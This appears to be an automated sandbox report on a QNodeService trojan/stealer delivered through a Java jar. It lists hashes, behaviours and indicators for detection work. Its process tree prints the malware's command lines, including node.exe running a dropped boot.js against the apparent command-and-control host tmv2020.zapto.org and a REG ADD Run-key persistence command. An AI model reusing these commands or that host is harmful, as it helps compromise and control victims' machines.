jar.jar
jar.jar
81KB
19-11-2020 12:27
9e8b6710fdd55ad0675295c2c3960732
aed08772376bde9f848f335e77e2e3c3c230234d
f2fb2d0c469abc0add346ef809ad86e0194400d391a2e5429b8cbeea2711bbad
Filter: none
-
QNodeService
Description
Trojan/stealer written in NodeJS and spread via Java downloader.
Tags
-
Executes dropped EXEnode.exenode.exenode.exe
Reported IOCs
pid process 3524 node.exe 2652 node.exe 1200 node.exe -
Adds Run key to start applicationreg.exe
Tags
TTPs
Reported IOCs
description ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\cf695db1-96d2-45d6-a745-87e554e6cd0d = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable
Reported IOCs
resource yara_rule behavioral2/files/0x000100000001ab51-170.dat js behavioral2/files/0x000100000001ab51-174.dat js behavioral2/files/0x000100000001ab51-178.dat js -
Looks up external IP address via web service
Description
Uses a legitimate IP lookup service to find the infected system's external IP.
Reported IOCs
flow ioc 21 wtfismyip.com 22 wtfismyip.com -
Checks processor information in registrynode.exe
Description
Processor information is often read in order to detect sandboxing environments.
TTPs
Reported IOCs
description ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcessesnode.exenode.exenode.exe
Reported IOCs
pid process 3524 node.exe 3524 node.exe 3524 node.exe 3524 node.exe 2652 node.exe 2652 node.exe 2652 node.exe 2652 node.exe 1200 node.exe 1200 node.exe 1200 node.exe 1200 node.exe 1200 node.exe 1200 node.exe 1200 node.exe 1200 node.exe 1200 node.exe 1200 node.exe -
Suspicious use of WriteProcessMemoryjava.exejavaw.exenode.exenode.exenode.execmd.exe
Reported IOCs
description pid process target process PID 2868 wrote to memory of 3744 2868 java.exe javaw.exe PID 2868 wrote to memory of 3744 2868 java.exe javaw.exe PID 3744 wrote to memory of 3524 3744 javaw.exe node.exe PID 3744 wrote to memory of 3524 3744 javaw.exe node.exe PID 3524 wrote to memory of 2652 3524 node.exe node.exe PID 3524 wrote to memory of 2652 3524 node.exe node.exe PID 2652 wrote to memory of 1200 2652 node.exe node.exe PID 2652 wrote to memory of 1200 2652 node.exe node.exe PID 1200 wrote to memory of 848 1200 node.exe cmd.exe PID 1200 wrote to memory of 848 1200 node.exe cmd.exe PID 848 wrote to memory of 4032 848 cmd.exe reg.exe PID 848 wrote to memory of 4032 848 cmd.exe reg.exe
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\jar.jarSuspicious use of WriteProcessMemory
-
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\08637946.tmpSuspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain tmv2020.zapto.orgExecutes dropped EXESuspicious behavior: EnumeratesProcessesSuspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_eahL7y\boot.js --hub-domain tmv2020.zapto.orgExecutes dropped EXESuspicious behavior: EnumeratesProcessesSuspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_eahL7y\boot.js --hub-domain tmv2020.zapto.orgExecutes dropped EXEChecks processor information in registrySuspicious behavior: EnumeratesProcessesSuspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "cf695db1-96d2-45d6-a745-87e554e6cd0d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "cf695db1-96d2-45d6-a745-87e554e6cd0d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""Adds Run key to start application
-
C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
MD53031a035435f0b9d833559aceedc07c6
SHA1e806e287c7b1324969351d6d7b3aa9903bb053f6
SHA256df480b78ce4f2811ba6849fbc1e892b4cefc4a6e00f616c9157b7b55c5ce088e
SHA512dae7101c4ffc96f8c8f89aaf638253e8199c2973412764e07062e0b75d98cbf0a0d3ef8228b7f14c7ed62e4033e22ce145e451c36b21cc4c2d5cfa6c6349e0d8
-
C:\Users\Admin\AppData\Local\Temp\08637946.tmp
MD59e8b6710fdd55ad0675295c2c3960732
SHA1aed08772376bde9f848f335e77e2e3c3c230234d
SHA256f2fb2d0c469abc0add346ef809ad86e0194400d391a2e5429b8cbeea2711bbad
SHA51226f94b0b9766e9c244297cbe4af78f1b09087fbe471f099b5a77f5ca76fd5c905ee4d36188af67dbd6dc2c7f8402c882d0d2503a288af277840a1025562eac96
-
C:\Users\Admin\AppData\Local\Temp\_qhub_node_eahL7y\boot.js
MD53859487feb5152e9d1afc4f8cd320608
SHA17bf154c9ddf3a71abf15906cdb60773e8ae07b62
SHA2568d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
SHA512826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
MD5f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
MD5f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
MD5f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
memory/848-180-0x0000000000000000-mapping.dmp
-
memory/1200-179-0x0000010C14700000-0x0000010C14701000-memory.dmp
-
memory/1200-177-0x0000000000000000-mapping.dmp
-
memory/2652-175-0x0000032D28D00000-0x0000032D28D01000-memory.dmp
-
memory/2652-173-0x0000000000000000-mapping.dmp
-
memory/3524-172-0x0000014395980000-0x0000014395981000-memory.dmp
-
memory/3524-169-0x0000000000000000-mapping.dmp
-
memory/3744-53-0x0000000000000000-mapping.dmp
-
memory/4032-181-0x0000000000000000-mapping.dmp